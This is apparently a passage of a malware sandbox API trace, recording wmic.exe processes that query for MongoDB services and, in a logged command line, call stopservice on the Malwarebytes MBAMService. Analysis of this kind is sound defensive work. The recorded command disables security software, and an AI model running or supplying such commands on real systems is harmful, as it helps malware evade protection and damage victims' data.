(_Size=0x18) returned 0x35d590 [0257.320] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0257.320] SysStringLen (param_1="root\\cimv2") returned 0xa [0257.320] free (_Block=0x35d570) [0257.320] free (_Block=0x35d550) [0257.320] free (_Block=0x35cd00) [0257.320] free (_Block=0x35cce0) [0257.320] free (_Block=0x35ccc0) [0257.320] free (_Block=0x35cca0) [0257.320] malloc (_Size=0x18) returned 0x35cca0 [0257.320] malloc (_Size=0x18) returned 0x35ccc0 [0257.320] malloc (_Size=0x18) returned 0x35cce0 [0257.320] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ca1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffc729d0 | out: ppNamespace=0xffc729d0*=0x1cb3b28) returned 0x0 [0257.323] free (_Block=0x35cce0) [0257.323] free (_Block=0x35ccc0) [0257.323] free (_Block=0x35cca0) [0257.323] CoSetProxyBlanket (pProxy=0x1cb3b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0257.324] free (_Block=0x35d590) [0257.324] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.324] ??0CHString@@QEAA@XZ () returned 0xef258 [0257.324] GetCurrentThreadId () returned 0x730 [0257.324] malloc (_Size=0x70) returned 0x35cf80 [0257.324] malloc (_Size=0x50) returned 0x35d000 [0257.324] malloc (_Size=0x50) returned 0x35d060 [0257.324] malloc (_Size=0x70) returned 0x35d0c0 [0257.324] malloc (_Size=0x70) returned 0x35d140 [0257.324] malloc (_Size=0x48) returned 0x35d1c0 [0257.324] malloc (_Size=0x18) returned 0x35cca0 [0257.324] lstrlenA (lpString="") returned 0 [0257.324] malloc (_Size=0x2) returned 0x356a50 [0257.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc0314c, cbMultiByte=-1, lpWideCharStr=0x356a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0257.324] free (_Block=0x356a50) [0257.324] malloc (_Size=0x70) returned 0x35d210 [0257.324] malloc (_Size=0x48) returned 0x35d290 [0257.324] malloc (_Size=0x18) returned 0x35ccc0 [0257.324] free (_Block=0x35cca0) [0257.324] IWbemServices:GetObject (in: This=0x1cb3b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xef288*=0x0, ppCallResult=0x0 | out: ppObject=0xef288*=0x1cdc030, ppCallResult=0x0) returned 0x0 [0257.337] malloc (_Size=0x18) returned 0x35cca0 [0257.338] IWbemClassObject:GetMethod (in: This=0x1cdc030, wszName="stopservice", lFlags=0, ppInSignature=0xef280, ppOutSignature=0xef298 | out: ppInSignature=0xef280*=0x0, ppOutSignature=0xef298*=0x1cdc530) returned 0x0 [0257.338] free (_Block=0x35cca0) [0257.338] IUnknown:Release (This=0x1cdc530) returned 0x0 [0257.338] IUnknown:Release (This=0x1cdc030) returned 0x0 [0257.338] ??0CHString@@QEAA@XZ () returned 0xef0a0 [0257.338] GetCurrentThreadId () returned 0x730 [0257.338] malloc (_Size=0x18) returned 0x35cca0 [0257.338] lstrlenA (lpString="") returned 0 [0257.338] malloc (_Size=0x2) returned 0x356a50 [0257.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc0314c, cbMultiByte=-1, lpWideCharStr=0x356a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0257.338] free (_Block=0x356a50) [0257.338] malloc (_Size=0x18) returned 0x35cce0 [0257.338] lstrlenA (lpString="") returned 0 [0257.338] malloc (_Size=0x2) returned 0x356a50 [0257.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc0314c, cbMultiByte=-1, lpWideCharStr=0x356a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0257.338] free (_Block=0x356a50) [0257.338] malloc (_Size=0x18) returned 0x35cd00 [0257.338] free (_Block=0x35cce0) [0257.338] malloc (_Size=0x18) returned 0x35cce0 [0257.338] lstrlenA (lpString="SELECT * FROM ") returned 14 [0257.338] malloc (_Size=0x1e) returned 0x35d2e0 [0257.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc04a40, cbMultiByte=-1, lpWideCharStr=0x35d2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0257.338] free (_Block=0x35d2e0) [0257.339] malloc (_Size=0x18) returned 0x35d550 [0257.339] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0257.339] SysStringLen (param_1="Win32_Service") returned 0xd [0257.339] free (_Block=0x35cce0) [0257.339] malloc (_Size=0x18) returned 0x35cce0 [0257.339] malloc (_Size=0x18) returned 0x35d570 [0257.339] lstrlenA (lpString=" WHERE ") returned 7 [0257.339] malloc (_Size=0x10) returned 0x35d590 [0257.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc03e20, cbMultiByte=-1, lpWideCharStr=0x35d590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0257.339] free (_Block=0x35d590) [0257.375] malloc (_Size=0x18) returned 0x35d590 [0257.375] SysStringLen (param_1=" WHERE ") returned 0x7 [0257.375] SysStringLen (param_1="name like '%%MongoDB%%'") returned 0x17 [0257.375] malloc (_Size=0x18) returned 0x35d5b0 [0257.375] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0257.375] SysStringLen (param_1=" WHERE name like '%%MongoDB%%'") returned 0x1e [0257.376] free (_Block=0x35d550) [0257.376] free (_Block=0x35d590) [0257.376] free (_Block=0x35d570) [0257.376] free (_Block=0x35cce0) [0257.376] malloc (_Size=0x18) returned 0x35cce0 [0257.376] IWbemServices:ExecQuery (in: This=0x1cb3b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MongoDB%%'", lFlags=48, pCtx=0x0, ppEnum=0xef088 | out: ppEnum=0xef088*=0x1cb3c28) returned 0x0 [0257.378] free (_Block=0x35cce0) [0257.378] CoSetProxyBlanket (pProxy=0x1cb3c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0257.380] IEnumWbemClassObject:Next (in: This=0x1cb3c28, lTimeout=-1, uCount=0x1, apObjects=0xef090, puReturned=0xef218 | out: apObjects=0xef090*=0x0, puReturned=0xef218*=0x0) returned 0x1 [0257.750] IUnknown:Release (This=0x1cb3c28) returned 0x0 [0257.751] free (_Block=0x35d5b0) [0257.751] free (_Block=0x35cd00) [0257.751] free (_Block=0x35cca0) [0257.751] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.751] free (_Block=0x35ccc0) [0257.751] free (_Block=0x35d1c0) [0257.751] free (_Block=0x35d140) [0257.751] free (_Block=0x35d0c0) [0257.752] free (_Block=0x35d060) [0257.752] free (_Block=0x35d000) [0257.752] free (_Block=0x35d290) [0257.752] free (_Block=0x35d210) [0257.752] free (_Block=0x35cf80) [0257.752] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.752] GetCurrentThreadId () returned 0x730 [0257.752] ??0CHString@@QEAA@PEBG@Z () returned 0xef5a8 [0257.752] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xef5a8 [0257.752] malloc (_Size=0x800) returned 0x35dd20 [0257.752] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x35dd20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0257.752] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0257.752] malloc (_Size=0x1c) returned 0x35cf80 [0257.752] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x35cf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0257.752] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0257.752] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0257.753] free (_Block=0x35cf80) [0257.753] free (_Block=0x35dd20) [0257.753] ??1CHString@@QEAA@XZ () returned 0x41398201 [0257.753] WbemLocator:IUnknown:Release (This=0x1cb3b28) returned 0x0 [0257.753] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0257.753] _kbhit () returned 0x0 [0257.754] free (_Block=0x35cf60) [0257.754] free (_Block=0x35cb00) [0257.755] free (_Block=0x35cae0) [0257.755] free (_Block=0x35cac0) [0257.755] free (_Block=0x35caa0) [0257.755] free (_Block=0x35cdc0) [0257.755] free (_Block=0x357140) [0257.755] free (_Block=0x35cf00) [0257.755] free (_Block=0x358680) [0257.755] free (_Block=0x35cba0) [0257.755] free (_Block=0x35cbc0) [0257.755] free (_Block=0x356ea0) [0257.755] free (_Block=0x35d4d0) [0257.755] free (_Block=0x35cbe0) [0257.755] free (_Block=0x35cc40) [0257.755] free (_Block=0x35d450) [0257.755] free (_Block=0x35d3d0) [0257.755] free (_Block=0x35cc20) [0257.755] free (_Block=0x35cc00) [0257.755] free (_Block=0x35cc60) [0257.755] free (_Block=0x35d370) [0257.755] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0257.755] free (_Block=0x35ce60) [0257.755] free (_Block=0x35cb40) [0257.755] free (_Block=0x35cf30) [0257.755] free (_Block=0x35cb80) [0257.756] free (_Block=0x358600) [0257.756] free (_Block=0x35cb60) [0257.756] free (_Block=0x35cb20) [0257.756] free (_Block=0x357f70) [0257.756] free (_Block=0x356980) [0257.756] free (_Block=0x3569d0) [0257.756] free (_Block=0x35cc80) [0257.756] free (_Block=0x356ac0) [0257.756] free (_Block=0x356e80) [0257.756] free (_Block=0x358040) [0257.756] free (_Block=0x356e60) [0257.756] free (_Block=0x358000) [0257.756] free (_Block=0x356e00) [0257.756] free (_Block=0x356e20) [0257.756] free (_Block=0x356ce0) [0257.756] free (_Block=0x356d00) [0257.756] free (_Block=0x356c80) [0257.756] free (_Block=0x356ca0) [0257.756] free (_Block=0x356d40) [0257.756] free (_Block=0x356d60) [0257.756] free (_Block=0x356da0) [0257.756] free (_Block=0x356dc0) [0257.756] free (_Block=0x356bc0) [0257.757] free (_Block=0x356be0) [0257.757] free (_Block=0x356b60) [0257.757] free (_Block=0x356b80) [0257.757] free (_Block=0x356c20) [0257.757] free (_Block=0x356c40) [0257.757] free (_Block=0x356b00) [0257.757] free (_Block=0x356b20) [0257.757] free (_Block=0x356a70) [0257.757] free (_Block=0x356a20) [0257.757] free (_Block=0x35cd30) [0257.757] WbemLocator:IUnknown:Release (This=0x1ca1390) returned 0x2 [0257.757] WbemLocator:IUnknown:Release (This=0x1cb3a98) returned 0x0 [0257.757] WbemLocator:IUnknown:Release (This=0x1ca1390) returned 0x1 [0257.757] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0257.757] WbemLocator:IUnknown:Release (This=0x1ca1390) returned 0x0 [0257.758] free (_Block=0x35ca20) [0257.758] free (_Block=0x35ca40) [0257.758] free (_Block=0x358540) [0257.758] free (_Block=0x35ca60) [0257.758] free (_Block=0x35ca80) [0257.758] free (_Block=0x358580) [0257.758] free (_Block=0x35c8a0) [0257.758] free (_Block=0x35c8c0) [0257.758] free (_Block=0x3583c0) [0257.758] free (_Block=0x35c8e0) [0257.758] free (_Block=0x35c900) [0257.758] free (_Block=0x358400) [0257.758] free (_Block=0x35c820) [0257.758] free (_Block=0x35c840) [0257.758] free (_Block=0x358340) [0257.758] free (_Block=0x35c860) [0257.758] free (_Block=0x35c880) [0257.758] free (_Block=0x358380) [0257.758] free (_Block=0x35c9a0) [0257.758] free (_Block=0x35c9c0) [0257.759] free (_Block=0x3584c0) [0257.759] free (_Block=0x35c9e0) [0257.759] free (_Block=0x35ca00) [0257.759] free (_Block=0x358500) [0257.759] free (_Block=0x35c7a0) [0257.759] free (_Block=0x35c7c0) [0257.759] free (_Block=0x3582c0) [0257.759] free (_Block=0x35c7e0) [0257.759] free (_Block=0x35c800) [0257.759] free (_Block=0x358300) [0257.759] free (_Block=0x35c920) [0257.759] free (_Block=0x35c940) [0257.759] free (_Block=0x358440) [0257.759] free (_Block=0x35c960) [0257.759] free (_Block=0x35c980) [0257.759] free (_Block=0x358480) [0257.759] free (_Block=0x35c6e0) [0257.759] free (_Block=0x35c700) [0257.759] free (_Block=0x358200) [0257.759] free (_Block=0x35c5a0) [0257.759] free (_Block=0x35c5c0) [0257.760] free (_Block=0x3580c0) [0257.760] free (_Block=0x35c560) [0257.760] free (_Block=0x35c580) [0257.760] free (_Block=0x358080) [0257.760] free (_Block=0x35c620) [0257.760] free (_Block=0x35c640) [0257.760] free (_Block=0x358140) [0257.760] free (_Block=0x35c720) [0257.760] free (_Block=0x35c740) [0257.760] free (_Block=0x358240) [0257.760] free (_Block=0x35c5e0) [0257.760] free (_Block=0x35c600) [0257.760] free (_Block=0x358100) [0257.760] free (_Block=0x35c660) [0257.760] free (_Block=0x35c680) [0257.760] free (_Block=0x358180) [0257.760] free (_Block=0x35c6a0) [0257.760] free (_Block=0x35c6c0) [0257.760] free (_Block=0x3581c0) [0257.760] free (_Block=0x35c760) [0257.761] free (_Block=0x35c780) [0257.761] free (_Block=0x358280) [0257.761] CoUninitialize () [0257.795] exit (_Code=0) [0257.795] free (_Block=0x356ef0) [0257.795] free (_Block=0x357f30) [0257.795] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.795] free (_Block=0x356fe0) [0257.795] free (_Block=0x356ae0) [0257.795] free (_Block=0x357ef0) [0257.795] free (_Block=0x357eb0) [0257.795] free (_Block=0x357e60) [0257.795] free (_Block=0x357e20) [0257.795] free (_Block=0x355ac0) [0257.795] free (_Block=0x357da0) [0257.795] free (_Block=0x355a80) [0257.795] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.795] free (_Block=0x3585c0) Thread: id = 239 os_tid = 0xa88 Thread: id = 240 os_tid = 0xb98 Thread: id = 241 os_tid = 0x32c Thread: id = 242 os_tid = 0x758 Thread: id = 243 os_tid = 0xbb0 Process: id = "30" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x70d65000" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 245 os_tid = 0xbbc [0257.943] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fd70 | out: lpSystemTimeAsFileTime=0x12fd70*(dwLowDateTime=0xaf195f30, dwHighDateTime=0x1d61d49)) [0257.943] GetCurrentProcessId () returned 0xbc0 [0257.943] GetCurrentThreadId () returned 0xbbc [0257.943] GetTickCount () returned 0x116a0e2 [0257.943] QueryPerformanceCounter (in: lpPerformanceCount=0x12fd78 | out: lpPerformanceCount=0x12fd78*=37811704866) returned 1 [0257.946] GetModuleHandleW (lpModuleName=0x0) returned 0xff920000 [0257.946] __set_app_type (_Type=0x1) [0257.946] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff96ced0) returned 0x0 [0257.947] __wgetmainargs (in: _Argc=0xff992380, _Argv=0xff992390, _Env=0xff992388, _DoWildCard=0, _StartInfo=0xff99239c | out: _Argc=0xff992380, _Argv=0xff992390, _Env=0xff992388) returned 0 [0257.947] ??0CHString@@QEAA@XZ () returned 0xff992ab0 [0257.947] malloc (_Size=0x30) returned 0x405a80 [0257.947] malloc (_Size=0x70) returned 0x407dc0 [0257.947] malloc (_Size=0x50) returned 0x405ac0 [0257.947] malloc (_Size=0x30) returned 0x407e40 [0257.947] malloc (_Size=0x48) returned 0x407e80 [0257.947] malloc (_Size=0x30) returned 0x407ed0 [0257.947] malloc (_Size=0x30) returned 0x407f10 [0257.947] ??0CHString@@QEAA@XZ () returned 0xff992f58 [0257.947] malloc (_Size=0x30) returned 0x407f50 [0257.947] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0257.947] SetConsoleCtrlHandler (HandlerRoutine=0xff965724, Add=1) returned 1 [0257.948] _onexit (_Func=0xff97f378) returned 0xff97f378 [0257.948] _onexit (_Func=0xff97f490) returned 0xff97f490 [0257.948] _onexit (_Func=0xff97f4d0) returned 0xff97f4d0 [0257.948] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0257.948] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0257.952] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0257.962] CoCreateInstance (in: rclsid=0xff9273a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff927370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff992940 | out: ppv=0xff992940*=0x1fd1390) returned 0x0 [0257.973] GetCurrentProcess () returned 0xffffffffffffffff [0257.973] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12fb40 | out: TokenHandle=0x12fb40*=0xf4) returned 1 [0257.973] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fb38 | out: TokenInformation=0x0, ReturnLength=0x12fb38) returned 0 [0257.973] malloc (_Size=0x118) returned 0x4069a0 [0257.973] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4069a0, TokenInformationLength=0x118, ReturnLength=0x12fb38 | out: TokenInformation=0x4069a0, ReturnLength=0x12fb38) returned 1 [0257.973] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4069a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=850772157, Attributes=0xd701), (Luid.LowPart=0x0, Luid.HighPart=4226960, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0257.973] free (_Block=0x4069a0) [0257.973] CloseHandle (hObject=0xf4) returned 1 [0257.974] malloc (_Size=0x40) returned 0x4069a0 [0257.974] malloc (_Size=0x40) returned 0x4069f0 [0257.974] malloc (_Size=0x40) returned 0x406a40 [0257.974] malloc (_Size=0x20a) returned 0x406a90 [0257.974] GetSystemDirectoryW (in: lpBuffer=0x406a90, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0257.974] free (_Block=0x406a90) [0257.974] malloc (_Size=0x18) returned 0x407f90 [0257.974] malloc (_Size=0x18) returned 0x407fb0 [0257.974] malloc (_Size=0x18) returned 0x406a90 [0257.974] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0257.974] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0257.974] free (_Block=0x407f90) [0257.974] free (_Block=0x407fb0) [0257.974] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0257.975] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0257.975] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0257.975] FreeLibrary (hLibModule=0x77940000) returned 1 [0257.975] free (_Block=0x406a90) [0257.975] _vsnwprintf (in: _Buffer=0x406a40, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x12f768 | out: _Buffer="ms_409") returned 6 [0257.975] malloc (_Size=0x20) returned 0x407f90 [0257.975] GetComputerNameW (in: lpBuffer=0x407f90, nSize=0x12fb40 | out: lpBuffer="XDUWTFONO", nSize=0x12fb40) returned 1 [0257.976] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.976] malloc (_Size=0x14) returned 0x406a90 [0257.976] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.976] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x12fb38 | out: lpNameBuffer=0x0, nSize=0x12fb38) returned 0x7fffffde000 [0257.977] GetLastError () returned 0xea [0257.977] malloc (_Size=0x40) returned 0x406ab0 [0257.977] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x406ab0, nSize=0x12fb38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12fb38) returned 0x1 [0257.977] lstrlenW (lpString="") returned 0 [0257.977] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.977] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0257.980] lstrlenW (lpString=".") returned 1 [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0257.980] lstrlenW (lpString="LOCALHOST") returned 9 [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0257.980] free (_Block=0x406a90) [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] malloc (_Size=0x14) returned 0x406a90 [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] malloc (_Size=0x14) returned 0x406b00 [0257.980] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.980] malloc (_Size=0x8) returned 0x406b20 [0257.980] malloc (_Size=0x18) returned 0x406b40 [0257.981] malloc (_Size=0x30) returned 0x406b60 [0257.981] malloc (_Size=0x18) returned 0x406ba0 [0257.981] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.981] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.981] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.981] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.981] malloc (_Size=0x30) returned 0x406bc0 [0257.981] malloc (_Size=0x18) returned 0x406c00 [0257.981] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.981] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.981] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.981] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.981] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.981] SysStringLen (param_1="IMPERSONATE") returned 0xb [0257.981] malloc (_Size=0x30) returned 0x406c20 [0257.981] malloc (_Size=0x18) returned 0x406c60 [0257.981] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.981] SysStringLen (param_1="IDENTIFY") returned 0x8 [0257.981] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.981] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.981] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0257.981] SysStringLen (param_1="DELEGATE") returned 0x8 [0257.981] malloc (_Size=0x30) returned 0x406c80 [0257.981] malloc (_Size=0x18) returned 0x406cc0 [0257.981] malloc (_Size=0x30) returned 0x406ce0 [0257.981] malloc (_Size=0x18) returned 0x406d20 [0257.982] SysStringLen (param_1="NONE") returned 0x4 [0257.982] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.982] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.982] SysStringLen (param_1="NONE") returned 0x4 [0257.982] malloc (_Size=0x30) returned 0x406d40 [0257.982] malloc (_Size=0x18) returned 0x406d80 [0257.982] SysStringLen (param_1="CONNECT") returned 0x7 [0257.982] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.982] malloc (_Size=0x30) returned 0x406da0 [0257.982] malloc (_Size=0x18) returned 0x406de0 [0257.982] SysStringLen (param_1="CALL") returned 0x4 [0257.982] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.982] SysStringLen (param_1="CALL") returned 0x4 [0257.982] SysStringLen (param_1="CONNECT") returned 0x7 [0257.982] malloc (_Size=0x30) returned 0x406e00 [0257.982] malloc (_Size=0x18) returned 0x406e40 [0257.982] SysStringLen (param_1="PKT") returned 0x3 [0257.982] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.982] SysStringLen (param_1="PKT") returned 0x3 [0257.982] SysStringLen (param_1="NONE") returned 0x4 [0257.982] SysStringLen (param_1="NONE") returned 0x4 [0257.982] SysStringLen (param_1="PKT") returned 0x3 [0257.982] malloc (_Size=0x30) returned 0x406e60 [0257.982] malloc (_Size=0x18) returned 0x406ea0 [0257.983] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.983] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.983] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.983] SysStringLen (param_1="NONE") returned 0x4 [0257.983] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.983] SysStringLen (param_1="PKT") returned 0x3 [0257.983] SysStringLen (param_1="PKT") returned 0x3 [0257.983] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.983] malloc (_Size=0x30) returned 0x408000 [0257.983] malloc (_Size=0x18) returned 0x406ec0 [0257.984] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.984] SysStringLen (param_1="DEFAULT") returned 0x7 [0257.984] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.984] SysStringLen (param_1="PKT") returned 0x3 [0257.984] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.984] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.984] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0257.984] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0257.984] malloc (_Size=0x30) returned 0x408040 [0257.984] malloc (_Size=0x40) returned 0x406ee0 [0257.984] malloc (_Size=0x20a) returned 0x406f30 [0257.984] GetSystemDirectoryW (in: lpBuffer=0x406f30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0257.984] free (_Block=0x406f30) [0257.984] malloc 